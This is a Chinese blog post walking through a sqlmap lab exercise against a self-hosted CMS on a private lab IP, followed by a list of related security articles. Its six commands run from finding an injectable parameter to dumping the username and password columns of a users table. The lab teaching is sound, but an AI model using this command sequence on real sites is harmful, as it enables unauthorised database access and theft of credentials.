記一次sqlmap的案例實驗

原創 水中煮鱼冒气 2020-02-22 09:25

文章目錄

環境搭建

網站搭建–window server 2008 phpstudy
測試機 kali虛擬機
在這裏插入圖片描述

Sql map參數

參數 含義
-u “url” 檢測注入點
–dbs 列出所有數據庫的名字
–current-db 列出當前數據庫的名字
-D 指定一個數據庫
–tables 列出表名
-T 指定表名
–columns 列出所有的字段名
-C 指定字段
–dump 列出字段內容

第一步 檢測注入點

[sqlmap -u http://192.168.139.136/cms/show.php?id=33]
在這裏插入圖片描述

第二步 列出所有數據庫的名字

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --dbs]
在這裏插入圖片描述

第三步 列出當前數據庫的名字

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --current-db]
在這裏插入圖片描述

第四步 列出表名

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables]
在這裏插入圖片描述

第五步列出所有的字段名

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables -T cms_users --columns]
在這裏插入圖片描述

第六步 列出字段內容

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms -T cms_users -C "username,password" --dump]
在這裏插入圖片描述

免責聲明

本文檔供學習,請使用者注意使用環境並遵守國家相關法律法規!
由於使用不當造成的後果上傳者概不負責!

水中煮魚冒氣
發佈了261 篇原創文章 · 獲贊 50 · 訪問量 9萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

在一次滲透中學會編寫Tamper腳本

拿到這個網站,通過對比查詢,我們發現 閉合參數 finsh 時,查詢出的內容更多 經過進一步判斷,確實存在漏洞 不過在測試的時候發現存在一定的過濾 但是可以通過內聯註釋進行繞過。 這裏也是加深瞭解了內聯註釋的知識點,之前只會簡單的

原創 2024-05-22 11:16:41

記一次奇妙的某個edu滲透測試

前話: 對登錄方法的輕視造成一系列的漏洞出現,對接口確實鑑權造成大量的信息泄露。從小程序到web端網址的奇妙的測試就此開始。(文章厚碼,請見諒) 1. 尋找到目標站點的小程序 進入登錄發現只需要姓名加學工號就能成功登錄,通過google

原創 2024-04-16 22:46:34

關於SQL語句中最實用的總結

前言:很多開發人員在寫代碼、開發的過程中對一些SQL語句或者程序的細節並不在意,有的人即使知道優化的寫法可能也會認爲這一點點細節不會影響程序的整體效率的。 在此我想說明:一個開發有這種想法,就說明千千萬萬個開發有這種想法,衆多細小的問題在足

原創 2021-04-10 21:09:28

手把手教你用Python輕鬆玩轉SQL注入

點擊上方“ Python爬蟲與數據挖掘 ”,進行關注 回覆“書籍”即可獲贈Python從入門到進階共10本電子書 今 日 雞 湯 山有木兮木有枝,心悅君兮君不知。 前言 大

原創 2021-03-26 21:20:06

搭建SQLo靶機與練習

SQLol安裝 實驗器材:Window 7 windows 2008 下載地址:http://github.com/SpiderLabs/MCIR 安裝流程: Window2008配置: 解壓壓縮包到網站根路徑(例如,我新建一個sql目錄,

osc_n08oztl3 2021-01-30 11:08:45

IIS 6.0 遠程代碼執行漏洞復現(cve-2017-7269)

IIS 6.0 遠程代碼執行漏洞復現(cve-2017-7269) 靶機(server2003)上的配置: 點擊添加/刪除windows組件 找到應用程序服務器,點開 選中IIS信息服務器 確定,然後就安裝了 安裝完成之後 在管理工

osc_8r37p3dx 2021-01-30 11:02:38

Web 安全滲透方面的學習路線?

照例審下題,題主說對滲透感興趣並且想真正搞 Web 滲透方面,在問題描述中提到「看了好多道哥的白帽子書和烏雲(知識庫)」,但感覺自己「瞎折騰了很久,沒啥收穫」。 這個情況其實並不是書籍或其他學習資源出了問題,而是你本身的學習路線

吳偉祥 2021-01-30 10:48:01

DC-9靶機滲透詳解

查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 掃描dc-9端口 訪問80端口 查看wappalyzer dirb http://10.9

osc_t46alvdj 2021-01-30 10:41:49

ctfhub技能樹sql注入題sqlmap工具解法

ctfhub技能樹sql注入題sqlmap工具解法 有工具爲啥還要手動注入呢 整數注入 啓用sqlmap 列出庫名 可以看到 flag在 ‘sqli’庫中 再用sqlmap列出字段 再查詢flag字段就能拿到flag了

osc_ty60k6mi 2021-01-30 10:09:43

[網絡安全提高班] 一〇一.網絡攻防溯源普及和醫療數據安全總結

當您閱讀到該篇文章時,作者已經將“網絡安全自學篇”設置成了收費專欄,首先說聲抱歉。感謝這一年來大家的閱讀和陪伴,這100篇安全文章記錄了自己從菜雞到菜鳥的成長史,該部分知識也花了很多精力去學習和總結。由於在外讀書且需要養娃,所以按最低價9.

osc_j9qcf98f 2021-01-30 09:46:20

sql注入學習第一篇---基礎

SQL注入原理 SQL注入攻擊指的是通過構建特殊的輸入作爲參數傳入Web應用程序,而這些輸入大都是SQL語法裏的一些組合, 通過執行SQL語句進而執行攻擊者所要的操作,其主要原因是程序沒有細緻地過濾用戶輸入的數據,致使非法數據侵

行走在风中 2020-07-07 21:40:09

sql注入繞waf小Tips

因爲對上次比賽sql的題挺不甘心 所以又着重複習了一遍sql,並記錄了平常繞waf的點 手工bypass要點 先通過破壞關鍵字測試出攔截規則 之後進行鍼對性繞過 Mysql 前期詳解:傳送門 1.1、聯合注入 0x01 and繞過

想冲大厂的癞蛤蟆 2020-07-07 11:59:33

pikachu靶場之SQL注入

0x00 前言 手工注入忘的差不多了。。。還是需要多多練習 以下關卡都是稍微測以下存不存在sql注入,查下數據庫名啥的 沒有將所有字段都爆出來。 衝鴨~ 0x01 數字型注入(post) 因爲是數字型,直接在後面加上真命題,不需要

0nc3 2020-07-07 09:51:37

JavaWeb開發防止SQL、XSS注入

SQL注入簡介 SQL注入是比較常見的網絡攻擊方式之一,它不是利用操作系統的BUG來實現攻擊,而是針對程序員編程時的疏忽,通過SQL語句,實現無帳號登錄,甚至篡改數據庫。 SQL注入攻擊實例 比如在一個登錄界面,要求輸入用戶名

GreenRookie 2020-07-07 07:16:11

sql注入繞過

1、大小寫繞過 改變語句中單詞的大小寫即可,如:select=>SelEct 2、雙寫繞過 如下: ununionion seselectlect 3、內聯註釋繞過 內聯註釋就是把一些特有的僅在MYSQL上的語句放在 /!../

野九 2020-07-05 03:38:03